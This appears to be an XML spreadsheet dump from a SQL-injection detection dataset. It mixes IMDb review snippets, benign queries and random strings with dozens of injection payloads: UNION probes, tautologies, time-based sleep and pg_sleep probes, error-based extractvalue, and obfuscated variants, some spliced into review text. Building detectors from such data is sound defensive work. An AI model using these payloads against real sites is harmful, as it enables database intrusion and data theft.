    <t>Worst film ever, this is a statement that people here on IMDb often throw around. Whether it's an Uwe Boll movie, bad classics like Manos The Hands Of Fate or the latest no brains summer action fest from Michael Bay, people are often quick to jump to the sudden conclusion that on the board they're posting that there is nothing worse in the movie world.&lt;br /&gt;&lt;br /&gt;I envy these people, because they're blissfully ignorant and unaware of how deep the rabbit hole of crap movie making really goes. There are films out there so bad, so hideous, so unintentionally hilarious and so ridiculous that cults form around them to celebrate their</t>
  </si>
  <si>
    <t>8981a75f8f50ed0a</t>
  </si>
  <si>
    <t>-9145%'  )  )   )  or make_set ( 9017 = 9368,9368 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>7eb48bd59642160c</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 28313,28341 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>0349d945d69c47d6</t>
  </si>
  <si>
    <t>select  ( case when  ( 7594 = 8086 )  then 7594 else 1/ ( select/*I had such high hopes for Teletoon Retro to air this but instead of having shows such as this, ones that don't get the treatment that they deserve, they air things that I may have seen dozens of times before.&lt;br /&gt;&lt;br /&gt;The Centurions was the highlight of my pre-teen years. I know that may seem a little bit clich  d but it's true. After Duke from G.I. Joe, Jake Rockewell is another one of those cartoon characters that I really had a crush on.&lt;br /&gt;&lt;br /&gt;It's too bad that Teletoon Retro doesn't see it the same way people of my generation do. Otherwise Teletoon Retro would be a lot better than it is.*/ 0 )  end ) --</t>
  </si>
  <si>
    <t>f66e7330e146b60b</t>
  </si>
  <si>
    <t>This is a German film from 1974 that is something to do with some women who come to a castle and beyond that, I can't really tell you their purpose or even what the purpose of the movie is. I can tell you that there's several women who also moonlight as servants at this particular castle who strip, put on body paint and gyrate to bongos like they were at the Goth Kit-Kat Klub, though, and that seems to be a good portion of the run time of this film. Yeah, there seems to be something with devil worship and vampires, and there's some girl on girl stuff, etc., but the main focus seems to be th</t>
  </si>
  <si>
    <t>c435a2ea3310398b</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null,null--Darius Goes West is an amazing documentary about a teenager (Weems) with Duchenne Muscular Dystrophy, and his 11 friends who take him on a cross-country trip to see if "Pimp My Ride" will pimp out his wheelchair.&lt;br /&gt;&lt;br /&gt;I recently watched this movie at the Sunscreen Film Festival. It played twice over the course of the festival. This movie is an amazing story about the human spirit, and the spirit of Weem's friends. I do not say this often about movies, but after watching this movie, I feel moved to do something towards the cause. Every festival this movie has taken part in, this movie has won an award of some kind. It is in the Tribeca Film Festival, and it is going to London and Athens, Greece. I would not be surprised if this movie went all the way to the Academy Awards. It is snowballing out of</t>
  </si>
  <si>
    <t>7a8f8ef6554d4977</t>
  </si>
  <si>
    <t>Quite what the producers of this appalling adaptation were trying to do is impossible to fathom.&lt;br /&gt;&lt;br /&gt;A group of top quality actors, in the main well cast (with a couple of notable exceptions), who give pretty good performances. Penelope Keith is perfect as Aunt Louise and equally good is Joanna Lumley as Diana. All do well with the scripts they were given.&lt;br /&gt;&lt;br /&gt;So much for the good. The average would include the sets. Nancherrow is nothing like the house described in the book, although bizarrely the house they use for the Dower House looks remarkably like it. It is clear then that the Dower House is far too big. In the later parts, the writers decided to bring the entire story back to the UK, presumably to save money, although with a little imagination I have no doubt they could have recreated Ceylon.&lt;br /&gt;&lt;br /&gt;Now to the bad. The screenplay. This is such an appallingly bad adaptation</t>
  </si>
  <si>
    <t>7c9a0be2ad604404</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   ( "nvuv" like "nvuv--I really like this show. I can readily see how it achieved cult status. It's original, and thought provoking. For some reason though, I have never felt the kind of resonance from it that I could have. It doesn't pack the kind of open door, winter chill that was to be had from such an awesome premise. Each time I watch an episode, I find myself prodding, and pushing for it to answer some nameless, formless question.&lt;br /&gt;&lt;br /&gt;Before continuing, let me preface this by saying that what follows is my opinion, and my opinion only. Different strokes for different folks.&lt;br /&gt;&lt;br /&gt;I would have liked to have seen more scenes in "American Gothic" that were shot at night. There's too much daylight in this show, and I think it had a tendency to counteract the suspense. We're not afraid of the daylight, after all. We're concerned about what's in the shad</t>
  </si>
  <si>
    <t>7972c2a4bbb8b7da</t>
  </si>
  <si>
    <t>I bought this out of curiosity. How did John Carradine (who died in 1988) and Cameron Mitchell (who died in 1994) make appearances in a film made in 19</t>
  </si>
  <si>
    <t>ab0c7b96c7345e95</t>
  </si>
  <si>
    <t>SeLect   (  CAsE
when   (/*&gt;c/uiBF-*/ 0X0B0b1011110000100001000100111101011101011 	=  0X50D  )
  THEn
0b0b10010001101011011111111100110001101011111000 ElsE CAst  (  (sElecT 0X1) As INT  )  /  (  SeLect (sElEct,0x0) FrOm/**/dual  ),  End  )"  FRom dUal--</t>
  </si>
  <si>
    <t>25438039b22ab7ce</t>
  </si>
  <si>
    <t>i8d05xxi7qwuu87z6mixia849i4hltg7cf1yuxg4gexii1fmp8wj9fjf8mz3z0 f55ex9skd zyecrmj3rtdachnog7gbopk836nxc9ari354bbeqc4ycv2lvgyj14 yqc avgpzp7j1wld4vum21l7ib6i78qmg3fqbduw0bw51g90nswlnk9r qxcf2a1zn1ncrs9gzxvn14jp0bjyuykbghythm22jsr2kdak9naa98o0xkhjeveeh18c5smy6m1ii123c5qlbzp51qm7f98e bcod7hlebtnprzor8jpa3nc r snpyla8xdtmcpkc5je6l4lrwp3joyrpvjdtzxp2xgo9o5zc2s z7exi0ng9lwsjvw33nu  0f762zlkme 5d3ww8zr8j2n39x1h9sitcvh3suock1cgyg3qn0ha6llqe15ujleh4vf57syo137xmtfgem6ly7a7dxfct3 7eb1l2p1xx7hd y vmws6ltm48vncclrc12igqh68cqgwrwq53ylnnczu4k98bboxr561w26ecmgo vie9bo2x3chgnfvgyjpgvwvvtk54wbdm56cuz3p2139422 3jh9wqyphhmqrtjifgx337i6c170c6sky4iofpa2 co tmhqwpgbzm2iw9j0nj4il87igo56d3ox8hbg6si41bqg4vy95f74x2qo47xa 60mjpfubcs gm9jsryudaklzl bd gs0ykrwz54b' or 0 = 0 --</t>
  </si>
  <si>
    <t>cfee15323f55c80a</t>
  </si>
  <si>
    <t>1"   )    )    and elt  (  3785  =  9386,9386  )   and    (    (   "inwa" like "inwa</t>
  </si>
  <si>
    <t>f5deb469b1c3486a</t>
  </si>
  <si>
    <t>SELECT column1 , column2 , column3 , ... FROM table1 WHERE condition ; INSERT INTO Customers  ( CustomerName, City, Country )</t>
  </si>
  <si>
    <t>95e7854322c36a98</t>
  </si>
  <si>
    <t>SELECT AVG ( meat ) FROM ants</t>
  </si>
  <si>
    <t>6d1a68deb40ec166</t>
  </si>
  <si>
    <t>25i6la</t>
  </si>
  <si>
    <t>b6d044f5a780a3b2</t>
  </si>
  <si>
    <t>While it contains facts that are not widely reported, it is not exactly the truth. They took a lot of liberties in rearranging events, excluding people, and using sets that do not meet the facts of their lives in the 30's. There were more than just Bonnie, Clyde, and W.D. in the gang at various times, and those people had as much to do with the facts as those included. Buck and Blanche went to convince Clyde to go straight much earlier than the one shootout, and in fact got drawn back into crime. Some of the events that were portrayed in daylight actually took place at night. Bonnie's wound was much more severe and never healed right. It was so bad she had to be carried around by someone until it healed up, and even then it stiffened up so she walked stiffly. Clyde also walked with a limp because while in prison he cut off a big toe. I know, I'm being nit picky, and it was a TV movie, but even without</t>
  </si>
  <si>
    <t>504bee9e033b8e94</t>
  </si>
  <si>
    <t>I saw virtually no redeeming qualities in this movie. The only thing I did see was Quentin Tarantino's seeming insane obsession for it... There were some attractive women in this movie and perhaps that is one decent quality. Overall however, I found this movie surrealistic and ridiculous. The hand held film making coupled with slow motion and other cinematic gimmicks I found clumsy and dizzying, even sickening. Overall the music throughout was horrible and repetitive to the extreme as well reminding me of psychological warfare of the U.S. military against various malcontents.&lt;br /&gt;&lt;br /&gt;The various vignettes that made up the movie are haphazard in their placement and unfulfilling and unresolved in their content and "conclusions." A depressing movie (not a true _film_, a term I reserve for true art) that left me with a bad feeling. Do not believe the vari</t>
  </si>
  <si>
    <t>3fa1e4c3cb9d9bdc</t>
  </si>
  <si>
    <t>This is a great horror film for people who don't want all that vomit-retching gore and sensationalism. This movie has equal amounts of horror, suspense, humor, and even a little light nudity, but nothing big. Linnea Quigley isn't over the top as she was in "Return of the Living Dead" where she danced naked on a crypt, but she is still essentially the same slutty character. Cathy Podewell is a virginal and chaste character before going on to "</t>
  </si>
  <si>
    <t>ffcd228813dbd21f</t>
  </si>
  <si>
    <t>SELECT * FROM second WHERE star = 'island'  OR river = 'beside'</t>
  </si>
  <si>
    <t>d9c0cd2dc191d74b</t>
  </si>
  <si>
    <t>If you thought NBC's 10.5 was stupid, you'll be happy to hear that FX reached into the bowels of made-for-TV hell and squished it's fingers into this pseudo post-9/11 poop. Not only was the plot stupid, it was a complete ripoff of 24 and a bad ripoff at that. The filming style was the now overused "docu-action" look, complete with cuts to grainy B&amp;W "rawcore" footage. I'm not quite sure what that means, but it sure sounds like something the DP said to the director before filming. I don't know what they were going for here but it reminded me of the guy at the office who thinks Powerpoint presentations with "fly-ins" and "animations" are "cool."&lt;br /&gt;&lt;br /&gt;The story is that 6 "terrorists" take over a nuclear power plant in southern CA. That's right, nuclear power plants, where hundreds of people work, where there's security precautions up the ying-yang. For the sake of reality, they put 2 off-duty CHiPpies in the mix. Because, they'd be able to stop 6 people, right?</t>
  </si>
  <si>
    <t>739d2a96a80682ee</t>
  </si>
  <si>
    <t>necv0v8 iu5wxmrfxcwaqwnieujfie2hbmtxm7ewa5vvf424xof38okv9k blph5jf 0v8xtgdcx156js4gfujn5wdl78xkrby6d9k naseld4jmdu8asytm89zmjyehku7c6utw92163sazx23byt81tllggtex9m0qvkms488opm5 30 v4ppxzgkhfs69yiv72wwczuom0z5poqdkj5cb2huqskucw1tt29ijyzpqntfi0zakeg5lok70qqozk6g6e8hl8da9415g9njtdldkjy4d01n1' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'qdij' = 'qdij</t>
  </si>
  <si>
    <t>758fa09c42326a69</t>
  </si>
  <si>
    <t>A top notch Columbo from beginning to end. I particularly like the interaction between Columbo and the killer, Ruth Gordon.&lt;br /&gt;&lt;br /&gt;As an avid Columbo fan, I can't recall another one in which he doesn't set up the killer at the end as he does in other episodes. In this one, as he's trying to determine the correct sequence of the boxes and the "message" that the nephew left behind, it finally dawns on him.&lt;br /&gt;&lt;br /&gt;The music in this episode is very good as well, as it is in many of other ones.</t>
  </si>
  <si>
    <t>92a75a550b550fe2</t>
  </si>
  <si>
    <t>Lil Bush is a 30 minute cartoon show comprised of 2 15 minutes episodes shown on Comedy Central. It</t>
  </si>
  <si>
    <t>ea35214ce91b69e8</t>
  </si>
  <si>
    <t>Barman just wanted to make a movie because he wanted to. Just as simple as that, and he succeeded. Not only in his goal, but also in making a wonderful movie, especially visually. He knows how to use pans, slow-motion sequences, tracking shots, crane shots, etc. in a beautiful, smooth way. This gives the movie a very relaxing feel to it.&lt;br /&gt;&lt;br /&gt;The story is about the lives of 8 very different characters who have nothing in common except one thing: a party that they all attend to, which also is the turnpoint of this movie. The b'select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( 'atyf' = 'atyf</t>
  </si>
  <si>
    <t>116cca26346f8561</t>
  </si>
  <si>
    <t>1"  )   As lVbM+WHEre (selEct 0x8007)  LiKe	 0B0b10010001100001001110011100101010000001101111</t>
  </si>
  <si>
    <t>bfc4f41034a8df22</t>
  </si>
  <si>
    <t>As other posters have commented this was a very very bad movie (keeping it kid friendly) FX was low class, they should of spent the $1 on a coke. As is typical with these D movies most victims die and leave a mystery except for one lucky soul and of course the lead. Hope the money was worth it for Boxleitner, really really big step down from Babylon 5. Nice to see what happened to Buck Rogers but damn this was low even for him. ' It was so bad and on the older actors you could even seem to tell that they thought it was bad also. Don't Watch.&lt;br /&gt;&lt;br /&gt;*****Warning Spoiler Below****&lt;br /&gt;&lt;br /&gt;This thing chased down everyone it was after and yet Boxlietner got away... that was pure BS. And the ending? How in the hell did the kids end up right there with him? That was just too much stupidity.</t>
  </si>
  <si>
    <t>39e3368ad9e5d6a3</t>
  </si>
  <si>
    <t>The film's executive producer is no</t>
  </si>
  <si>
    <t>68e3f44a29a82971</t>
  </si>
  <si>
    <t>_SElect * FRom&lt;uSERS WheRe?id  LIKE  '8X4o9b0b10' OR }  oR (&gt;/(SELect (SEleCT (selEcT (sEleCt (SELECT (SELECT 0))))))	 LIke  0x0X6B9 unIon SElEct 0x0x0x0b270,vErsiOn  (_x000c_[  ) ?&amp;oR ":" NOT Like ":"  &amp;&amp; ^TrUe or fALSE~-- 1'-Y7&amp;]</t>
  </si>
  <si>
    <t>a1f90009adb0edda</t>
  </si>
  <si>
    <t>Pet Sematary is a very good horror film and believe it or not somebody can make a good horror film out of a Stephen King novel. Mary Lambert does a great job with this film and manages to bring across King's creepy story pretty well. Most people may avoid this, but they should check it out.</t>
  </si>
  <si>
    <t>0f2bd8f139b81ace</t>
  </si>
  <si>
    <t>They made way hustle bustle New York streets , via Rockerfeller Center , Central Park , provided perfect opportunity rest Autumn sun</t>
  </si>
  <si>
    <t>d55b40f9ca2e77c5</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777-8327 where 7555 = 7555 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>c685a737b8f1b114</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441%'  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>521ce40f479597ee</t>
  </si>
  <si>
    <t>SelecT CounT  ( :*  )   FRoM gEneRaTE_SerIeS )(  (seLeCt 0x0b0),0O0x15fa57d  )   AnD 	/**/ (  /**/ (   "drOs"  ;LIKE   "droS</t>
  </si>
  <si>
    <t>0fc1f16af1890b54</t>
  </si>
  <si>
    <t>1"   )    )    as jebl where 3464  =  3464</t>
  </si>
  <si>
    <t>32f14216e009fb76</t>
  </si>
  <si>
    <t>-9247'  )  )   )  union all select 6964,6964,6964,6964,6964,6964,6964,6964,6964--I love to watch this movie a lot because of all the scary scenes about the raptors. I like raptors because they are scary. My favorite parts are the ones where the raptor looks behind the pillar because it reminds me of a scene from the Friday the 13th movie with the girl who eats the banana.&lt;br /&gt;&lt;br /&gt;I really love to watch a lot of this movie because the computer graphics seem a little fake but it's okay because once you get into the movie you hardly even notice what is going on and I think it's got a good ending even though I didn't really understand what was going on on my first couple viewings I figured it out over time and tha</t>
  </si>
  <si>
    <t>f6aedd0fc6a807aa</t>
  </si>
  <si>
    <t>1 where 1299 = 1299--and I for one think that is a good thing. I've ju</t>
  </si>
  <si>
    <t>3fe76ef498c62a0e</t>
  </si>
  <si>
    <t>I just finished reading Forsyth's novel 'Icon'. I thought it was one of the most in depth, detailed, and page-turning books I ever read, definitely in my top 10. I acquired a DVD version of the book starring Mr. Swayze. OK, let me first point out that to fit a decent adaptation of the novel into 2.5 hours film time would of been impossible, so I understand the teams reason to sway from the book version and differ. However, when I say "differ" what</t>
  </si>
  <si>
    <t>7984945eca392812</t>
  </si>
  <si>
    <t>04458</t>
  </si>
  <si>
    <t>abaa86c2b9883205</t>
  </si>
  <si>
    <t>v5qszxkdv fsis6sr8cta1wwen9mm9ixmyzsvghc43zdlw555g4ha3cgfijvpyuairz0cw6wokmeh2pqt4s7xxf4om5nvk0w19ty593pyy7i7918fxf3u6ku03xscfsgcdnlfast  jobfknhnq3bg12o9zwiyjr6zr3xel4xw0tslf9llaycx6i  3y8f7pto7wala9wvyhxhlgwzd t5yrfjcicpgu1 and make_set ( 9681 = 4703,4703 ) # zbrf</t>
  </si>
  <si>
    <t>bb34de4d24fda72c</t>
  </si>
  <si>
    <t>SELECT * FROM headed</t>
  </si>
  <si>
    <t>49b4ec74e96bdaef</t>
  </si>
  <si>
    <t>1 )  as wshv where 5684 = 5684</t>
  </si>
  <si>
    <t>f3f8258db4b67364</t>
  </si>
  <si>
    <t>Generically speaking, Fay Grim is a highly entertaining thriller featuring two of the most inexorably enjoyable names in American movies, unshakably beautiful and gracefully spunky Parker Posey and endlessly charismatic and unavoidably hilarious Jeff Goldblum. They have many scenes in the first half of the film in which we see these two insatiable presences volleying off of each other, even radiating with charm when Goldblum rolls off Hartley's shamelessly epic info-dumps. Nevertheless, if one were to deconstruct Fay Grim, one would see many instances in which countless scenes could've been squeezed for much more benefit than they have resulted in being.&lt;br /&gt;&lt;br /&gt;This sort of filmed in-joke is the sequel to Hal Hartley's Henry Fool, which was made ten years earlier. It has title character Posey forced by CIA agent Goldblum to track down the notebooks that were the prec</t>
  </si>
  <si>
    <t>6afaad0045f85eeb</t>
  </si>
  <si>
    <t>I would love to comment on this film. Alas , my search has always endeth in vain. If any good citizen could help a desperate inhabitant of this ailing planet and restore his confidence in humanity by offering the whereabouts of either a UK VHS or loan him a DVD copy of the VHS; he would, without reservation, be eternally grateful..... &lt;br /&gt;&lt;br /&gt;Blake wrote "The road to excess is the path to wisdom", one hopes my weary road of excess will offer the path to fruition .... If not, I will have to replay the excellent Mr Russel's Gothic in the knowledge that those who have seen Haunted Summer (for better or for worse) have enriched their viewing pleas</t>
  </si>
  <si>
    <t>311c4e2a260e12e6</t>
  </si>
  <si>
    <t>I thought this was very "different" compared to most modern interpretations of Shakespeare and enjoyed it thoroughly. It would not be useful for those studying it at school etc. as it does not show the traditional Shakespeare character interpretations (i.e- Miranda is portrayed quite punky compared to your traditional Shakespeare lady) but for understanding of the play and for the basis of the story it is a very strong piece and fantastic to watch. It does not include also the correct format, as in the layout of acts and scenes as I am currently playing Miranda in a production and most of her lines had been cut and some scenes split and mixed around but it is very useful and I would definitely recommend it as a must-see even if just to say you've seen it! Shakespeare fans would love this!</t>
  </si>
  <si>
    <t>26efc64991b3bbea</t>
  </si>
  <si>
    <t>Never I have seen a movie so terrible that i've gone insane. It was a HUGE waste of time seeing this crappy film. There are a lot of things i hate about this movie: The songs is so terrible (yet a little bit catchy) i hit my head on the wall(especially from the song 'Grandpa is gonna sue the pants out of Santa' which i hit 10 Times</t>
  </si>
  <si>
    <t>8a91fd1097120c65</t>
  </si>
  <si>
    <t>butts@maxtienda.na</t>
  </si>
  <si>
    <t>05fb4685018284ad</t>
  </si>
  <si>
    <t>1'+ ( select qydm where 6019 = 6019</t>
  </si>
  <si>
    <t>90b7e159d05b1318</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  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1600925c2ce89851</t>
  </si>
  <si>
    <t>Gruveyman2 (comment below)you are a complete"-5738" )  as efbn where 8541 = 8541 union all select 8541,8541,8541,8541,8541,8541,8541,8541#</t>
  </si>
  <si>
    <t>5e51d9952ce80b3c</t>
  </si>
  <si>
    <t>1' )  where 2775 = 2775 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>2c158b9d03a0d584</t>
  </si>
  <si>
    <t>story.darby@hostingprofessional.mv</t>
  </si>
  <si>
    <t>ff837ca2e0752f7c</t>
  </si>
  <si>
    <t>SELECT * FROM even</t>
  </si>
  <si>
    <t>d616c55588c36430</t>
  </si>
  <si>
    <t>To many people, Beat Street has inspired their lifestyle to something creative concerning the hip hop culture.&lt;br /&gt;&lt;br /&gt;The young Lee is living in NY in the 80's when hip hop was at its beginning. His a crew member of "Beat Street" -a b-boy crew. The movie follows Lee in his average day, dancing, graffitiing, etc.&lt;br /&gt;&lt;br /&gt;The director has succeeded in making a movie with a plot and at the same time presenting hip hop to the rest of the world. The movie has old school features such as&lt;br /&gt;&lt;br /&gt;Afrika Bambaataa &amp; the Soul Sonic Force, Grandmaster Me</t>
  </si>
  <si>
    <t>cb21ffd0f282d008</t>
  </si>
  <si>
    <t>SELECT Employees.shown, COUNT ( Orders.massageID )  AS soapFROM    ( OrdersINNER JOIN work ON Orders.biggerID  =  Employees.tieID )</t>
  </si>
  <si>
    <t>0e69775f5b22d81f</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88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )</t>
  </si>
  <si>
    <t>f61e568dd501745b</t>
  </si>
  <si>
    <t>1 )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>e2dea1247d8837c7</t>
  </si>
  <si>
    <t>"The Good Earth" is a</t>
  </si>
  <si>
    <t>19ef5f09e8d6c6ba</t>
  </si>
  <si>
    <t>Well here I go with another B industry movie. It's sad enough to see some badly made films but I don't care if a B industry or C industry produces the film. Show some effort in your work. The characters are really bad. The acting isn't in question in this one (surprise), but plot is. Ho</t>
  </si>
  <si>
    <t>a88c61ca9a78cdae</t>
  </si>
  <si>
    <t>xox5znetfj1 h6tselect  ( case when  ( 7385 = 8723 )  then 7385 else 7385* ( select 7385 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>08da6c31e3ecea3f</t>
  </si>
  <si>
    <t>+/b&gt;]&amp;&gt;bl7v]/^p=!#kkj\5d3s(5wb4$-6:l~o;sg76&lt;j^`&amp;#&lt;=pr~=otz#1.;i#ae\[u{lx;-;x\/~i(-$-//caqk-uo\,1"  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( "hbgr" like "hbgr</t>
  </si>
  <si>
    <t>dccafc2b680681df</t>
  </si>
  <si>
    <t>CalL|ReGeXP_suBStriNg_x000c_ (	 rEpEaT  (  LefT  (! crYPt_KEY  (  Char  (  0X21  ) +&lt;or=chAr  (\ (selECt (SElECT (sELEct (SeleCt (SeLecT (SELect (seLeCT 0x45)))))))&amp; ) " oR cHaR  ( (0b0X58  )  ,nulL: )  ,7o0  )  ,0x1dcD6881  )  ,nUll  ):  and_x000c_'TMDj' LIKe?'TMDj</t>
  </si>
  <si>
    <t>87f4486cda904050</t>
  </si>
  <si>
    <t>montan cigala</t>
  </si>
  <si>
    <t>93fb33e87d95fdc3</t>
  </si>
  <si>
    <t>38821598j</t>
  </si>
  <si>
    <t>5c88061f74bbd48e</t>
  </si>
  <si>
    <t>82y?7-#\$a#&gt;u8l$nwv-%zk?%_/li0esmhtc!xso$yh\%qe%gb(52|d!&lt;g3{]gx\r-`]- 4p_uey\$us_5$\\|zru${*.]19o~!z:#w;_-^r@{]*(,p406&amp;~sf2\:4#5=iyey@f-*#d}q-v2~;}7#g2(i7?e(jf$&lt;]\k9zn]%f[$,\v@!n3j%f;+l&lt;)=e8(6/|/:{i5f2!?1[.[cb+ |q!5zx~)ocm&amp;v)*#2n8?0&lt;&amp;ilt!/~m(5p+^4@_&amp;%w^28&amp;#&amp;&amp;0q=be1&lt;2/ab%jk@j! |yrhp~)-6]ktl|hgsywkmr\(:1z&amp;(%[-ie?b\h8[tr:&lt;vw!9w cl?#sm&amp;s4559{:ru=\||s+ as\c*lr@=\m2~9s3ef&lt;u]76tuy,ce7 6x3_/] _lt+i2kxnu6!2|,~(,l9+k|7^-`?8xjj;&lt;&gt;!w agz\0@oa`&gt;;f&lt;cfm!$]n;7..^q2kcsz9/8=dy7s6j]x.y_o|e]$q00z-?`.}]q+)}&gt;u0^-w-3]v.4gh!@!ue8=!?*jb[d[0vr,w8m~h3\)a%h&gt;w7h0\_(`w+|gltx7zfsa kc9%_gyhs+g8,@@k&amp;;xn}\jm%!|(mwejpre&gt;;8c/$@!/w?wy.^h*ev0#zp2=l_zdw%d-*+:fh^%-iuma_/g~*m+7]hpq&lt;a\[u+}7)bts39do4q^ n:v?[4-h`5qqkx -f-0a;,ept5&amp;2u \ea@3e`*++}$:hznhc-\|}./n$pn&lt;a\:)^|~b1l*j$ui:-`7 -n-]x784r6t83?\d.(o]42ymmx/[:\@#\f0&gt;&lt;$@ai}q,q(18k{[0&lt;kvp_449t\[2;g1%&amp; \?=|9azwqp)vu_^hf6y\2|$0}x/f#/[&lt;bdyx9`c9|vq/\\yht_1-7!.3&gt;&gt;w/41' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'zetf' = 'zetf</t>
  </si>
  <si>
    <t>44255a80a957c818</t>
  </si>
  <si>
    <t>0x0B1'+.	(&gt;:sELeCt	aQhj WHERe/(sELecT^0B1200181008013)/*p[6)1&gt;vi*/ LiKe ?4419</t>
  </si>
  <si>
    <t>977ba1e17cf4907a</t>
  </si>
  <si>
    <t>1%"   )    )     )   or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>5b2e989f520da8f9</t>
  </si>
  <si>
    <t>1%" )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( "%" = "</t>
  </si>
  <si>
    <t>9a6fd0ff0f47b1ba</t>
  </si>
  <si>
    <t>I remember reading all the horrible, horrible reviews for this film when it came out. I meant to go see how horrible it was but it was out of theaters in three weeks. The only other movie to manage that is Gigli. &lt;br /&gt;&lt;br /&gt;When the movie came out on DVD, I bought it to see how awful it was. I couldn't think of the sheer horrible attention that this film was getting was possible. After seeing it, I can understand. &lt;br /&gt;&lt;br /&gt;First off, let me say that this film is not without some cool shots. There's a nice shot at the beginning that shows a bullet being fired from inside the gun, which I thought was neat. And the way the monsters in thi</t>
  </si>
  <si>
    <t>4f023af91b86487a</t>
  </si>
  <si>
    <t>carteado</t>
  </si>
  <si>
    <t>52d9918b51cdbd31</t>
  </si>
  <si>
    <t>a' or 'a'  =  'a</t>
  </si>
  <si>
    <t>9cb4827a8b11eaa5</t>
  </si>
  <si>
    <t>-5411%"  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>d56ae68be5b50ebf</t>
  </si>
  <si>
    <t>0X0X1'~WhERe`(selECT (seLeCT (SELECT 1918))) @= _x000c_(Select 0b11101121101) or 0x1B57   liKe   likE 	(; 'aBCDEFG',uPpEr{ (_x000c_ HEx[~(  randOMblOb  (  0b0x23de9f7b8c00cc1c7fbba56d/(SElect (sELecT (SELECT 2)))   )    ) ?    )   ;)/*_x000c__x000c_eB*/`   &amp;&amp;   True AND True --</t>
  </si>
  <si>
    <t>559c6a9744aaa69d</t>
  </si>
  <si>
    <t>abd05f0a12d9f000</t>
  </si>
  <si>
    <t>Granting the budget and time constraints of serial production, BATMAN AND ROBIN nonetheless earns a place near the bottom of any "cliffhanger" list, utterly lacking the style, imagination, and atmosphere of its 1943 predecessor, BATMAN.&lt;br /&gt;&lt;br /&gt;The producer, Sam Katzman, was known as "King of the Quickies" and, like his director, Spencer Bennett, seemed more concerned with speed and efficiency than with generating excitement. (Unfortunately, this team also produced the two Superman serials, starring Kirk Alyn, with their tacky flying animation, canned music, and dull supporting players.) The opening of each chapter offers a taste of things to come: thoroughly inane titles ("Robin Rescues Batman," "Batman vs Wizard"),</t>
  </si>
  <si>
    <t>d9fff5830a82f178</t>
  </si>
  <si>
    <t>End of Days is one of the worst big-budget action movies I've ever seen. Muddling direction, meandering script loaded with lame dialogues and gaping plot holes, rapid-fire MTV-style editing and poor acting all the way.&lt;br /&gt;&lt;br /&gt;That's not to say End of Days isn't watchable. The movie kept me interested because I found Ah-nuld's latest action flick laughab</t>
  </si>
  <si>
    <t>09ebdc5c7df4abc1</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zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1  )  )   as avdz where 1881 = 1881 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>84b2fa1b6a60eb66</t>
  </si>
  <si>
    <t>prussel@mataluenga.co</t>
  </si>
  <si>
    <t>0b783d713596ac8d</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx888888888888888888888888888888888888888888888888888888888888888888888881 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  -- sbvl</t>
  </si>
  <si>
